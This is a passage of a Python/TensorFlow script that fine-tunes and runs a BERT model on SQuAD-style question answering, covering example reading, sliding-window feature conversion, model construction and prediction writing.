"If null_score - best_non_null is greater than the threshold predict null.")
class SquadExample(object):
"""A single training/test example for simple sequence classification.
For examples without an answer, the start and end position are -1.
"""
def __init__(self,
qas_id,
question_text,
doc_tokens,
orig_answer_text=None,
start_position=None,
end_position=None,
is_impossible=False):
self.qas_id = qas_id
self.question_text = question_text
self.doc_tokens = doc_tokens
self.orig_answer_text = orig_answer_text
self.start_position = start_position
self.end_position = end_position
self.is_impossible = is_impossible
def __str__(self):
return self.__repr__()
def __repr__(self):
s = ""
s += "qas_id: %s" % (tokenization.printable_text(self.qas_id))
s += ", question_text: %s" % (
tokenization.printable_text(self.question_text))
s += ", doc_tokens: [%s]" % (" ".join(self.doc_tokens))
if self.start_position:
s += ", start_position: %d" % (self.start_position)
if self.start_position:
s += ", end_position: %d" % (self.end_position)
if self.start_position:
s += ", is_impossible: %r" % (self.is_impossible)
return s
class InputFeatures(object):
"""A single set of features of data."""
def __init__(self,
unique_id,
example_index,
doc_span_index,
tokens,
token_to_orig_map,
token_is_max_context,
input_ids,
input_mask,
segment_ids,
start_position=None,
end_position=None,
is_impossible=None):
self.unique_id = unique_id
self.example_index = example_index
self.doc_span_index = doc_span_index
self.tokens = tokens
self.token_to_orig_map = token_to_orig_map
self.token_is_max_context = token_is_max_context
self.input_ids = input_ids
self.input_mask = input_mask
self.segment_ids = segment_ids
self.start_position = start_position
self.end_position = end_position
self.is_impossible = is_impossible
def read_squad_examples(input_file, is_training):
"""Read a SQuAD json file into a list of SquadExample."""
with tf.gfile.Open(input_file, "r") as reader:
input_data = json.load(reader)["data"]
def is_whitespace(c):
if c == " " or c == "\t" or c == "\r" or c == "\n" or ord(c) == 0x202F:
return True
return False
examples = []
for entry in input_data:
for paragraph in entry["paragraphs"]:
paragraph_text = paragraph["context"]
doc_tokens = []
char_to_word_offset = []
prev_is_whitespace = True
for c in paragraph_text:
if is_whitespace(c):
prev_is_whitespace = True
else:
if prev_is_whitespace:
doc_tokens.append(c)
else:
doc_tokens[-1] += c
prev_is_whitespace = False
char_to_word_offset.append(len(doc_tokens) - 1)
for qa in paragraph["qas"]:
qas_id = qa["id"]
question_text = qa["question"]
start_position = None
end_position = None
orig_answer_text = None
is_impossible = False
if is_training:
if FLAGS.version_2_with_negative:
is_impossible = qa["is_impossible"]
if (len(qa["answers"]) != 1) and (not is_impossible):
raise ValueError(
"For training, each question should have exactly 1 answer.")
if not is_impossible:
answer = qa["answers"][0]
orig_answer_text = answer["text"]
answer_offset = answer["answer_start"]
answer_length = len(orig_answer_text)
start_position = char_to_word_offset[answer_offset]
end_position = char_to_word_offset[answer_offset + answer_length -
1]
# Only add answers where the text can be exactly recovered from the
# document. If this CAN'T happen it's likely due to weird Unicode
# stuff so we will just skip the example.
#
# Note that this means for training mode, every example is NOT
# guaranteed to be preserved.
actual_text = " ".join(doc_tokens[start_position:(end_position +
1)])
cleaned_answer_text = " ".join(
tokenization.whitespace_tokenize(orig_answer_text))
if actual_text.find(cleaned_answer_text) == -1:
tf.logging.warning("Could not find answer: '%s' vs. '%s'",
actual_text, cleaned_answer_text)
continue
else:
start_position = -1
end_position = -1
orig_answer_text = ""
example = SquadExample(
qas_id=qas_id,
question_text=question_text,
doc_tokens=doc_tokens,
orig_answer_text=orig_answer_text,
start_position=start_position,
end_position=end_position,
is_impossible=is_impossible)
examples.append(example)
return examples
def convert_examples_to_features(examples, tokenizer, max_seq_length,
doc_stride, max_query_length, is_training,
output_fn):
"""Loads a data file into a list of `InputBatch`s."""
unique_id = 1000000000
for (example_index, example) in enumerate(examples):
query_tokens = tokenizer.tokenize(example.question_text)
if len(query_tokens) > max_query_length:
query_tokens = query_tokens[0:max_query_length]
tok_to_orig_index = []
orig_to_tok_index = []
all_doc_tokens = []
for (i, token) in enumerate(example.doc_tokens):
orig_to_tok_index.append(len(all_doc_tokens))
sub_tokens = tokenizer.tokenize(token)
for sub_token in sub_tokens:
tok_to_orig_index.append(i)
all_doc_tokens.append(sub_token)
tok_start_position = None
tok_end_position = None
if is_training and example.is_impossible:
tok_start_position = -1
tok_end_position = -1
if is_training and not example.is_impossible:
tok_start_position = orig_to_tok_index[example.start_position]
if example.end_position < len(example.doc_tokens) - 1:
tok_end_position = orig_to_tok_index[example.end_position + 1] - 1
else:
tok_end_position = len(all_doc_tokens) - 1
(tok_start_position, tok_end_position) = _improve_answer_span(
all_doc_tokens, tok_start_position, tok_end_position, tokenizer,
example.orig_answer_text)
# The -3 accounts for [CLS], [SEP] and [SEP]
max_tokens_for_doc = max_seq_length - len(query_tokens) - 3
# We can have documents that are longer than the maximum sequence length.
# To deal with this we do a sliding window approach, where we take chunks
# of the up to our max length with a stride of `doc_stride`.
_DocSpan = collections.namedtuple( # pylint: disable=invalid-name
"DocSpan", ["start", "length"])
doc_spans = []
start_offset = 0
while start_offset < len(all_doc_tokens):
length = len(all_doc_tokens) - start_offset
if length > max_tokens_for_doc:
length = max_tokens_for_doc
doc_spans.append(_DocSpan(start=start_offset, length=length))
if start_offset + length == len(all_doc_tokens):
break
start_offset += min(length, doc_stride)
for (doc_span_index, doc_span) in enumerate(doc_spans):
tokens = []
token_to_orig_map = {}
token_is_max_context = {}
segment_ids = []
tokens.append("[CLS]")
segment_ids.append(0)
for token in query_tokens:
tokens.append(token)
segment_ids.append(0)
tokens.append("[SEP]")
segment_ids.append(0)
for i in range(doc_span.length):
split_token_index = doc_span.start + i
token_to_orig_map[len(tokens)] = tok_to_orig_index[split_token_index]
is_max_context = _check_is_max_context(doc_spans, doc_span_index,
split_token_index)
token_is_max_context[len(tokens)] = is_max_context
tokens.append(all_doc_tokens[split_token_index])
segment_ids.append(1)
tokens.append("[SEP]")
segment_ids.append(1)
input_ids = tokenizer.convert_tokens_to_ids(tokens)
# The mask has 1 for real tokens and 0 for padding tokens. Only real
# tokens are attended to.
input_mask = [1] * len(input_ids)
# Zero-pad up to the sequence length.
while len(input_ids) < max_seq_length:
input_ids.append(0)
input_mask.append(0)
segment_ids.append(0)
assert len(input_ids) == max_seq_length
assert len(input_mask) == max_seq_length
assert len(segment_ids) == max_seq_length
start_position = None
end_position = None
if is_training and not example.is_impossible:
# For training, if our document chunk does not contain an annotation
# we throw it out, since there is nothing to predict.
doc_start = doc_span.start
doc_end = doc_span.start + doc_span.length - 1
out_of_span = False
if not (tok_start_position >= doc_start and
tok_end_position <= doc_end):
out_of_span = True
if out_of_span:
start_position = 0
end_position = 0
else:
doc_offset = len(query_tokens) + 2
start_position = tok_start_position - doc_start + doc_offset
end_position = tok_end_position - doc_start + doc_offset
if is_training and example.is_impossible:
start_position = 0
end_position = 0
if example_index < 20:
tf.logging.info("*** Example ***")
tf.logging.info("unique_id: %s" % (unique_id))
tf.logging.info("example_index: %s" % (example_index))
tf.logging.info("doc_span_index: %s" % (doc_span_index))
tf.logging.info(
"tokens: %s" %
" ".join([tokenization.printable_text(x) for x in tokens]))
tf.logging.info("token_to_orig_map: %s" % " ".join(
["%d:%d" % (x, y) for (x, y) in six.iteritems(token_to_orig_map)]))
tf.logging.info("token_is_max_context: %s" % " ".join([
"%d:%s" % (x, y) for (x, y) in six.iteritems(token_is_max_context)
]))
tf.logging.info("input_ids: %s" % " ".join([str(x) for x in input_ids]))
tf.logging.info("input_mask: %s" %
" ".join([str(x) for x in input_mask]))
tf.logging.info("segment_ids: %s" %
" ".join([str(x) for x in segment_ids]))
if is_training and example.is_impossible:
tf.logging.info("impossible example")
if is_training and not example.is_impossible:
answer_text = " ".join(tokens[start_position:(end_position + 1)])
tf.logging.info("start_position: %d" % (start_position))
tf.logging.info("end_position: %d" % (end_position))
tf.logging.info("answer: %s" %
(tokenization.printable_text(answer_text)))
feature = InputFeatures(
unique_id=unique_id,
example_index=example_index,
doc_span_index=doc_span_index,
tokens=tokens,
token_to_orig_map=token_to_orig_map,
token_is_max_context=token_is_max_context,
input_ids=input_ids,
input_mask=input_mask,
segment_ids=segment_ids,
start_position=start_position,
end_position=end_position,
is_impossible=example.is_impossible)
# Run callback
output_fn(feature)
unique_id += 1
def _improve_answer_span(doc_tokens, input_start, input_end, tokenizer,
orig_answer_text):
"""Returns tokenized answer spans that better match the annotated answer."""
# The SQuAD annotations are character based. We first project them to
# whitespace-tokenized words. But then after WordPiece tokenization, we can
# often find a "better match". For example:
#
# Question: What year was John Smith born?
# Context: The leader was John Smith (1895-1943).
# Answer: 1895
#
# The original whitespace-tokenized answer will be "(1895-1943).". However
# after tokenization, our tokens will be "( 1895 - 1943 ) .". So we can match
# the exact answer, 1895.
#
# However, this is not always possible. Consider the following:
#
# Question: What country is the top exporter of electornics?
# Context: The Japanese electronics industry is the lagest in the world.
# Answer: Japan
#
# In this case, the annotator chose "Japan" as a character sub-span of
# the word "Japanese". Since our WordPiece tokenizer does not split
# "Japanese", we just use "Japanese" as the annotation. This is fairly rare
# in SQuAD, but does happen.
tok_answer_text = " ".join(tokenizer.tokenize(orig_answer_text))
for new_start in range(input_start, input_end + 1):
for new_end in range(input_end, new_start - 1, -1):
text_span = " ".join(doc_tokens[new_start:(new_end + 1)])
if text_span == tok_answer_text:
return (new_start, new_end)
return (input_start, input_end)
def _check_is_max_context(doc_spans, cur_span_index, position):
"""Check if this is the 'max context' doc span for the token."""
# Because of the sliding window approach taken to scoring documents, a single
# token can appear in multiple documents. E.g.
# Doc: the man went to the store and bought a gallon of milk
# Span A: the man went to the
# Span B: to the store and bought
# Span C: and bought a gallon of
# ...
#
# Now the word 'bought' will have two scores from spans B and C. We only
# want to consider the score with "maximum context", which we define as
# the *minimum* of its left and right context (the *sum* of left and
# right context will always be the same, of course).
#
# In the example the maximum context for 'bought' would be span C since
# it has 1 left context and 3 right context, while span B has 4 left context
# and 0 right context.
best_score = None
best_span_index = None
for (span_index, doc_span) in enumerate(doc_spans):
end = doc_span.start + doc_span.length - 1
if position < doc_span.start:
continue
if position > end:
continue
num_left_context = position - doc_span.start
num_right_context = end - position
score = min(num_left_context, num_right_context) + 0.01 * doc_span.length
if best_score is None or score > best_score:
best_score = score
best_span_index = span_index
return cur_span_index == best_span_index
def create_model(bert_config, is_training, input_ids, input_mask, segment_ids,
use_one_hot_embeddings):
"""Creates a classification model."""
model = modeling.BertModel(
config=bert_config,
is_training=is_training,
input_ids=input_ids,
input_mask=input_mask,
token_type_ids=segment_ids,
use_one_hot_embeddings=use_one_hot_embeddings)
final_hidden = model.get_sequence_output()
final_hidden_shape = modeling.get_shape_list(final_hidden, expected_rank=3)
batch_size = final_hidden_shape[0]
seq_length = final_hidden_shape[1]
hidden_size = final_hidden_shape[2]
output_weights = tf.get_variable(
"cls/squad/output_weights", [2, hidden_size],
initializer=tf.truncated_normal_initializer(stddev=0.02))
output_bias = tf.get_variable(
"cls/squad/output_bias", [2], initializer=tf.zeros_initializer())
final_hidden_matrix = tf.reshape(final_hidden,
[batch_size * seq_length, hidden_size])
logits = tf.matmul(final_hidden_matrix, output_weights, transpose_b=True)
logits = tf.nn.bias_add(logits, output_bias)
logits = tf.reshape(logits, [batch_size, seq_length, 2])
logits = tf.transpose(logits, [2, 0, 1])
unstacked_logits = tf.unstack(logits, axis=0)
(start_logits, end_logits) = (unstacked_logits[0], unstacked_logits[1])
return (start_logits, end_logits)
def model_fn_builder(bert_config, init_checkpoint, learning_rate,
num_train_steps, num_warmup_steps, use_tpu,
use_one_hot_embeddings):
"""Returns `model_fn` closure for TPUEstimator."""
def model_fn(features, labels, mode, params): # pylint: disable=unused-argument
"""The `model_fn` for TPUEstimator."""
tf.logging.info("*** Features ***")
for name in sorted(features.keys()):
tf.logging.info(" name = %s, shape = %s" % (name, features[name].shape))
unique_ids = features["unique_ids"]
input_ids = features["input_ids"]
input_mask = features["input_mask"]
segment_ids = features["segment_ids"]
is_training = (mode == tf.estimator.ModeKeys.TRAIN)
(start_logits, end_logits) = create_model(
bert_config=bert_config,
is_training=is_training,
input_ids=input_ids,
input_mask=input_mask,
segment_ids=segment_ids,
use_one_hot_embeddings=use_one_hot_embeddings)
tvars = tf.trainable_variables()
initialized_variable_names = {}
scaffold_fn = None
if init_checkpoint:
(assignment_map, initialized_variable_names
) = modeling.get_assignment_map_from_checkpoint(tvars, init_checkpoint)
if use_tpu:
def tpu_scaffold():
tf.train.init_from_checkpoint(init_checkpoint, assignment_map)
return tf.train.Scaffold()
scaffold_fn = tpu_scaffold
else:
tf.train.init_from_checkpoint(init_checkpoint, assignment_map)
tf.logging.info("**** Trainable Variables ****")
for var in tvars:
init_string = ""
if var.name in initialized_variable_names:
init_string = ", *INIT_FROM_CKPT*"
tf.logging.info(" name = %s, shape = %s%s", var.name, var.shape,
init_string)
output_spec = None
if mode == tf.estimator.ModeKeys.TRAIN:
seq_length = modeling.get_shape_list(input_ids)[1]
def compute_loss(logits, positions):
one_hot_positions = tf.one_hot(
positions, depth=seq_length, dtype=tf.float32)
log_probs = tf.nn.log_softmax(logits, axis=-1)
loss = -tf.reduce_mean(
tf.reduce_sum(one_hot_positions * log_probs, axis=-1))
return loss
start_positions = features["start_positions"]
end_positions = features["end_positions"]
start_loss = compute_loss(start_logits, start_positions)
end_loss = compute_loss(end_logits, end_positions)
total_loss = (start_loss + end_loss) / 2.0
train_op = optimization.create_optimizer(total_loss, learning_rate,
num_train_steps,
num_warmup_steps, use_tpu)
output_spec = contrib_tpu.TPUEstimatorSpec(
mode=mode,
loss=total_loss,
train_op=train_op,
scaffold_fn=scaffold_fn)
elif mode == tf.estimator.ModeKeys.PREDICT:
predictions = {
"unique_ids": unique_ids,
"start_logits": start_logits,
"end_logits": end_logits,
}
output_spec = contrib_tpu.TPUEstimatorSpec(
mode=mode, predictions=predictions, scaffold_fn=scaffold_fn)
else:
raise ValueError("Only TRAIN and PREDICT modes are supported: %s" %
(mode))
return output_spec
return model_fn
def input_fn_builder(input_file, seq_length, is_training, drop_remainder):
"""Creates an `input_fn` closure to be passed to TPUEstimator."""
name_to_features = {
"unique_ids": tf.FixedLenFeature([], tf.int64),
"input_ids": tf.FixedLenFeature([seq_length], tf.int64),
"input_mask": tf.FixedLenFeature([seq_length], tf.int64),
"segment_ids": tf.FixedLenFeature([seq_length], tf.int64),
}
if is_training:
name_to_features["start_positions"] = tf.FixedLenFeature([], tf.int64)
name_to_features["end_positions"] = tf.FixedLenFeature([], tf.int64)
def _decode_record(record, name_to_features):
"""Decodes a record to a TensorFlow example."""
example = tf.parse_single_example(record, name_to_features)
# tf.Example only supports tf.int64, but the TPU only supports tf.int32.
# So cast all int64 to int32.
for name in list(example.keys()):
t = example[name]
if t.dtype == tf.int64:
t = tf.to_int32(t)
example[name] = t
return example
def input_fn(params):
"""The actual input function."""
batch_size = params["batch_size"]
# For training, we want a lot of parallel reading and shuffling.
# For eval, we want no shuffling and parallel reading doesn't matter.
d = tf.data.TFRecordDataset(input_file)
if is_training:
d = d.repeat()
d = d.shuffle(buffer_size=100)
d = d.apply(
contrib_data.map_and_batch(
lambda record: _decode_record(record, name_to_features),
batch_size=batch_size,
drop_remainder=drop_remainder))
return d
return input_fn
RawResult = collections.namedtuple("RawResult",
["unique_id", "start_logits", "end_logits"])
def write_predictions(all_examples, all_features, all_results, n_best_size,
max_answer_length, do_lower_case, output_prediction_file,
output_nbest_file, output_null_log_odds_file):
"""Write final predictions to the json file and log-odds of null if needed."""
tf.logging.info("Writing predictions to: %s" % (output_prediction_file))
tf.logging.info("Writing nbest to: %s" % (output_nbest_file))
example_index_to_features = collections.defaultdict(list)
for feature in all_features:
example_index_to_features[feature.example_index].append(feature)
unique_id_to_result = {}
for result in all_results:
unique_id_to_result[result.unique_id] = result
_PrelimPrediction = collections.namedtuple( # pylint: disable=invalid-name
"PrelimPrediction",
["feature_index", "start_index", "end_index", "start_logit", "end_logit"])
all_predictions = collections.OrderedDict()
all_nbest_json = collections.OrderedDict()
scores_diff_json = collections.OrderedDict()
for (example_index, example) in enumerate(all_examples):
features = example_index_to_features[example_index]
prelim_predictions = []
# keep track of the minimum score of null start+end of position 0
score_null = 1000000 # large and positive
min_null_feature_index = 0 # the paragraph slice with min mull score
null_start_logit = 0 # the start logit at the slice with min null score
null_end_logit = 0 # the end logit at the slice with min null score
for (feature_index, feature) in enumerate(features):
result = unique_id_to_result[feature.unique_id]
start_indexes = _get_best_indexes(result.start_logits, n_best_size)
end_indexes = _get_best_indexes(result.end_logits, n_best_size)
# if we could have irrelevant answers, get the min score of irrelevant
if FLAGS.version_2_with_negative:
feature_null_score = result.start_logits[0] + result.end_logits[0]
if feature_null_score < score_null:
score_null = feature_null_score
min_null_feature_index = feature_index
null_start_logit = result.start_logits[0]
null_end_logit = result.end_logits[0]
for start_index in start_indexes:
for end_index in end_indexes:
# We could hypothetically create invalid predictions, e.g., predict
# that the start of the span is in the question. We throw out all
# invalid predictions.
if start_index >= len(feature.tokens):
continue
if end_index >= len(feature.tokens):
continue
if start_index not in feature.token_to_orig_map:
continue
if end_index not in feature.token_to_orig_map:
continue
if not feature.token_is_max_context.get(start_index, False):
continue
if end_index < start_index:
continue
length = end_index - start_index + 1
if length > max_answer_length:
continue
prelim_predictions.append(
_PrelimPrediction(
feature_index=feature_index,
start_index=start_index,
end_index=end_index,
start_logit=result.start_logits[start_index],
end_logit=result.end_logits[end_index]))
if FLAGS.version_2_with_negative:
prelim_predictions.append(
_PrelimPrediction(
feature_index=min_null_feature_index,
start_index=0,
end_index=0,
start_logit=null_start_logit,
end_logit=null_end_logit))
prelim_predictions = sorted(
prelim_predictions,
key=lambda x: (x.start_logit + x.end_logit),
reverse=True)
_NbestPrediction = collections.namedtuple( # pylint: disable=invalid-name
"NbestPrediction", ["text", "start_logit", "end_logit"])
seen_predictions = {}
nbest = []
for pred in prelim_predictions:
if len(nbest) >= n_best_size:
break
feature = features[pred.feature_index]
if pred.start_index > 0: # this is a non-null prediction
tok_tokens = feature.tokens[pred.start_index:(pred.end_index + 1)]
orig_doc_start = feature.token_to_orig_map[pred.start_index]
orig_doc_end = feature.token_to_orig_map[pred.end_index]
orig_tokens = example.doc_tokens[orig_doc_start:(orig_doc_end + 1)]
tok_text = " ".join(tok_tokens)
# De-tokenize WordPieces that have been split off.
tok_text = tok_text.replace(" ##", "")
tok_text = tok_text.replace("##", "")
# Clean whitespace
tok_text = tok_text.strip()
tok_text = " ".join(tok_text.split())
orig_text = " ".join(orig_tokens)
final_text = get_final_text(tok_text, orig_text, do_lower_case)
if final_text in seen_predictions:
continue
seen_predictions[final_text] = True
else:
final_text = ""
seen_predictions[final_text] = True
nbest.append(
_NbestPrediction(
text=final_text,
start_logit=pred.start_logit,
end_logit=pred.end_logit))
# if we didn't inlude the empty option in the n-best, inlcude it
if FLAGS.version_2_with_negative:
if "" not in seen_predictions:
nbest.append(
_NbestPrediction(
text="", start_logit=null_start_logit,
end_logit=null_end_logit))
# In very rare edge cases we could have no valid predictions. So we
# just create a nonce prediction in this case to avoid failure.
if not nbest:
nbest.append(
_NbestPrediction(text="empty", start_logit=0.0, end_logit=0.0))
assert len(nbest) >= 1
total_scores = []
best_non_null_entry = None
for entry in nbest:
total_scores.append(entry.start_logit + entry.end_logit)
if not best_non_null_entry:
if entry.text:
best_non_null_entry = entry
probs = _compute_softmax(total_scores)
nbest_json = []
for (i, entry) in enumerate(nbest):
output = collections.OrderedDict()
output["text"] = entry.text
output["probability"] = probs[i]
output["start_logit"] = entry.start_logit
output["end_logit"] = entry.end_logit
nbest_json.append(output)
assert len(nbest_json) >= 1
if not FLAGS.version_2_with_negative:
all_predictions[example.qas_id] = nbest_json[0]["text"]
else:
# predict "" iff the null score - the score of best non-null > threshold
score_diff = score_null - best_non_null_entry.start_logit - (
best_non_null_entry.end_logit)
scores_diff_json[example.qas_id] = score_diff
if score_diff > FLAGS.null_score_diff_threshold:
all_predictions[example.qas_id] = ""
else:
all_predictions[example.qas_id] = best_non_null_entry.text
all_nbest_json[example.qas_id] = nbest_json
with tf.gfile.GFile(output_prediction_file, "w") as writer:
writer.write(json.dumps(all_predictions, indent=4) + "\n")
with tf.gfile.GFile(output_nbest_file, "w") as writer:
writer.write(json.dumps(all_nbest_json, indent=4) + "\n")
if FLAGS.version_2_with_negative:
with tf.gfile.GFile(output_null_log_odds_file, "w") as writer:
writer.write(json.dumps(scores_diff_json, indent=4) + "\n")
def get_final_text(pred_text, orig_text, do_lower_case):
"""Project the tokenized prediction back to the original text."""
# When we created the data, we kept track of the alignment between original
# (whitespace tokenized) tokens and our WordPiece tokenized tokens. So
# now `orig_text` contains the span of our original text corresponding to the
# span that we predicted.
#
# However, `orig_text` may contain extra characters that we don't want in
# our prediction.
#
# For example, let's say:
# pred_text = steve smith
# orig_text = Steve Smith's
#
# We don't want to return `orig_text` because it contains the extra "'s".
#
# We don't want to return `pred_text` because it's already been normalized
# (the SQuAD eval script also does punctuation stripping/lower casing but
# our tokenizer does additional normalization like stripping accent
# characters).
#
# What we really want to return is "Steve Smith".
#
# Therefore, we have to apply a semi-complicated alignment heruistic between
# `pred_text` and `orig_text` to get a character-to-charcter alignment. This
# can fail in certain cases in which case we just return `orig_text`.
def _strip_spaces(text):
ns_chars = []
ns_to_s_map = collections.OrderedDict()
for (i, c) in enumerate(text):
if c == " ":
continue
ns_to_s_map[len(ns_chars)] = i
ns_chars.append(c)
ns_text = "".join(ns_chars)
return (ns_text, ns_to_s_map)
# We first tokenize `orig_text`, strip whitespace from the result
# and `pred_text`, and check if they are the same length. If they are
# NOT the same length, the heuristic has failed. If they are the same
# length, we assume the characters are one-to-one aligned.
tokenizer = tokenization.BasicTokenizer(do_lower_case=do_lower_case)
tok_text = " ".join(tokenizer.tokenize(orig_text))
start_position = tok_text.find(pred_text)
if start_position == -1:
if FLAGS.verbose_logging:
tf.logging.info("Unable to find text: '%s' in '%s'" %
(pred_text, orig_text))
return orig_text
end_position = start_position + len(pred_text) - 1
(orig_ns_text, orig_ns_to_s_map) = _strip_spaces(orig_text)
(tok_ns_text, tok_ns_to_s_map) = _strip_spaces(tok_text)
if len(orig_ns_text) != len(tok_ns_text):
if FLAGS.verbose_logging:
tf.logging.info("Length not equal after stripping spaces: '%s' vs '%s'",
orig_ns_text, tok_ns_text)
return orig_text
# We then project the characters in `pred_text` back to `orig_text` using
# the character-to-character alignment.
tok_s_to_ns_map = {}
for (i, tok_index) in six.iteritems(tok_ns_to_s_map):
tok_s_to_ns_map[tok_index] = i
orig_start_position = None
if start_position in tok_s_to_ns_map:
ns_start_position = tok_s_to_ns_map[start_position]
if ns_start_position in orig_ns_to_s_map:
orig_start_position = orig_ns_to_s_map[ns_start_position]
if orig_start_position is None:
if FLAGS.verbose_logging:
tf.logging.info("Couldn't map start position")
return orig_text
orig_end_position = None
if end_position in tok_s_to_ns_map:
ns_end_position = tok_s_to_ns_map[end_position]
if ns_end_position in orig_ns_to_s_map:
orig_end_position = orig_ns_to_s_map[ns_end_position]
if orig_end_position is None:
if FLAGS.verbose_logging:
tf.logging.info("Couldn't map end position")
return orig_text
output_text = orig_text[orig_start_position:(orig_end_position + 1)]
return output_text
def _get_best_indexes(logits, n_best_size):
"""Get the n-best logits from a list."""
index_and_score = sorted(enumerate(logits), key=lambda x: x[1], reverse=True)
best_indexes = []
for i in range(len(index_and_score)):
if i >= n_best_size:
break
best_indexes.append(index_and_score[i][0])
return best_indexes
def _compute_softmax(scores):
"""Compute softmax probability over raw logits."""
if not scores:
return []
max_score = None
for score in scores:
if max_score is None or score > max_score:
max_score = score
exp_scores = []
total_sum = 0.0
for score in scores:
x = math.exp(score - max_score)
exp_scores.append(x)
total_sum += x
probs = []
for score in exp_scores:
probs.append(score / total_sum)
return probs
class FeatureWriter(object):
"""Writes InputFeature to TF example file."""
def __init__(self, filename, is_training):
self.filename = filename
self.is_training = is_training
self.num_features = 0
self._writer = tf.python_io.TFRecordWriter(filename)
def process_feature(self, feature):
"""Write a InputFeature to the TFRecordWriter as a tf.train.Example."""
self.num_features += 1
def create_int_feature(values):
feature = tf.train.Feature(
int64_list=tf.train.Int64List(value=list(values)))
return feature
features = collections.OrderedDict()
features["unique_ids"] = create_int_feature([feature.unique_id])
features["input_ids"] = create_int_feature(feature.input_ids)
features["input_mask"] = create_int_feature(feature.input_mask)
features["segment_ids"] = create_int_feature(feature.segment_ids)
if self.is_training:
features["start_positions"] = create_int_feature([feature.start_position])
features["end_positions"] = create_int_feature([feature.end_position])
impossible = 0
if feature.is_impossible:
impossible = 1
features["is_impossible"] = create_int_feature([impossible])
tf_example = tf.train.Example(features=tf.train.Features(feature=features))
self._writer.write(tf_example.SerializeToString())
def close(self):
self._writer.close()
def validate_flags_or_throw(bert_config):
"""Validate the input FLAGS or throw an exception."""
tokenization.validate_case_matches_checkpoint(FLAGS.do_lower_case,
FLAGS.init_checkpoint)
if not FLAGS.do_train and not FLAGS.do_predict:
raise ValueError("At least one of `do_train` or `do_predict` must be True.")
if FLAGS.do_train:
if not FLAGS.train_file:
raise ValueError(
"If `do_train` is True, then `train_file` must be specified.")
if FLAGS.do_predict:
if not FLAGS.predict_input_file:
raise ValueError(
"If `do_predict` is True, then specify `predict_input_file`")
if FLAGS.max_seq_length > bert_config.max_position_embeddings:
raise ValueError(
"Cannot use sequence length %d because the BERT model "
"was only trained up to sequence length %d" %
(FLAGS.max_seq_length, bert_config.max_position_embeddings))
if FLAGS.max_seq_length <= FLAGS.max_query_length + 3:
raise ValueError(
"The max_seq_length (%d) must be greater than max_query_length "
"(%d) + 3" % (FLAGS.max_seq_length, FLAGS.max_query_length))
def main(_):
tf.logging.set_verbosity(tf.logging.INFO)
bert_config = modeling.BertConfig.from_json_file(FLAGS.bert_config_file)
validate_flags_or_throw(bert_config)
tf.gfile.MakeDirs(FLAGS.output_dir)
tokenizer = tokenization.FullTokenizer(
vocab_file=FLAGS.vocab_file, do_lower_case=FLAGS.do_lower_case)
tpu_cluster_resolver = None
if FLAGS.use_tpu and FLAGS.tpu_name:
tpu_cluster_resolver = contrib_cluster_resolver.TPUClusterResolver(
FLAGS.tpu_name, zone=FLAGS.tpu_zone, project=FLAGS.gcp_project)
is_per_host = contrib_tpu.InputPipelineConfig.PER_HOST_V2
run_config = contrib_tpu.RunConfig(
cluster=tpu_cluster_resolver,
master=FLAGS.master,
model_dir=FLAGS.output_dir,
save_checkpoints_steps=FLAGS.save_checkpoints_steps,
tpu_config=contrib_tpu.TPUConfig(
iterations_per_loop=FLAGS.iterations_per_loop,
num_shards=FLAGS.num_tpu_cores,
per_host_input_for_training=is_per_host))
train_examples = None
num_train_steps = None
num_warmup_steps = None
if FLAGS.do_train:
train_examples = read_squad_examples(
input_file=FLAGS.train_file, is_training=True)
num_train_steps = int(
len(train_examples) / FLAGS.train_batch_size * FLAGS.num_train_epochs)
num_warmup_steps = int(num_train_steps * FLAGS.warmup_proportion)
# Pre-shuffle the input to avoid having to make a very large shuffle
# buffer in in the `input_fn`.
rng = random.Random(12345)
rng.shuffle(train_examples)
model_fn = model_fn_builder(
bert_config=bert_config,
init_checkpoint=FLAGS.init_checkpoint,
learning_rate=FLAGS.learning_rate,
num_train_steps=num_train_steps,
num_warmup_steps=num_warmup_steps,
use_tpu=FLAGS.use_tpu,
use_one_hot_embeddings=FLAGS.use_tpu)
# If TPU is not available, this will fall back to normal Estimator on CPU
# or GPU.
estimator = contrib_tpu.TPUEstimator(
use_tpu=FLAGS.use_tpu,
model_fn=model_fn,
config=run_config,
train_batch_size=FLAGS.train_batch_size,
predict_batch_size=FLAGS.predict_batch_size)
if FLAGS.do_train:
# We write to a temporary file to avoid storing very large constant tensors
# in memory.
train_writer = FeatureWriter(
filename=os.path.join(FLAGS.output_dir,
"train.tf_record." + FLAGS.exp_name),
is_training=True)
convert_examples_to_features(
examples=train_examples,
tokenizer=tokenizer,
max_seq_length=FLAGS.max_seq_length,
doc_stride=FLAGS.doc_stride,
max_query_length=FLAGS.max_query_length,
is_training=True,
output_fn=train_writer.process_feature)
train_writer.close()
tf.logging.info("***** Running training *****")
tf.logging.info(" Num orig examples = %d", len(train_examples))
tf.logging.info(" Num split examples = %d", train_writer.num_features)
tf.logging.info(" Batch size = %d", FLAGS.train_batch_size)
tf.logging.info(" Num steps = %d", num_train_steps)
del train_examples
train_input_fn = input_fn_builder(
input_file=train_writer.filename,
seq_length=FLAGS.max_seq_length,
is_training=True,
drop_remainder=True)
estimator.train(input_fn=train_input_fn, max_steps=num_train_steps)
if FLAGS.do_predict:
eval_examples = read_squad_examples(
input_file=FLAGS.predict_input_file, is_training=False)
eval_writer = FeatureWriter(
filename=os.path.join(FLAGS.output_dir,
"eval.tf_record." + FLAGS.exp_name),
is_training=False)
eval_features = []
def append_feature(feature):
eval_features.append(feature)
eval_writer.process_feature(feature)
convert_examples_to_features(
examples=eval_examples,
tokenizer=tokenizer,
max_seq_length=FLAGS.max_seq_length,
doc_stride=FLAGS.doc_stride,
max_query_length=FLAGS.max_query_length,
is_training=False,
output_fn=append_feature)
eval_writer.close()
tf.logging.info("***** Running predictions *****")
tf.logging.info(" Num orig examples = %d", len(eval_examples))
tf.logging.info(" Num split examples = %d", len(eval_features))
tf.logging.info(" Batch size = %d", FLAGS.predict_batch_size)
all_results = []
predict_input_fn = input_fn_builder(
input_file=eval_writer.filename,
seq_length=FLAGS.max_seq_length,
is_training=False,
drop_remainder=False)
# If running eval on the TPU, you will need to specify the number of
# steps.
all_results = []
for result in estimator.predict(
predict_input_fn, yield_single_examples=True):
if len(all_results) % 1000 == 0:
tf.logging.info("Processing example: %d" % (len(all_results)))
unique_id = int(result["unique_ids"])
start_logits = [float(x) for x in result["start_logits"].flat]
end_logits = [float(x) for x in result["end_logits"].flat]
all_results.append(
RawResult(
unique_id=unique_id,
start_logits=start_logits,
end_logits=end_logits))
if FLAGS.predict_output_dir:
tf.gfile.MakeDirs(FLAGS.predict_output_dir)
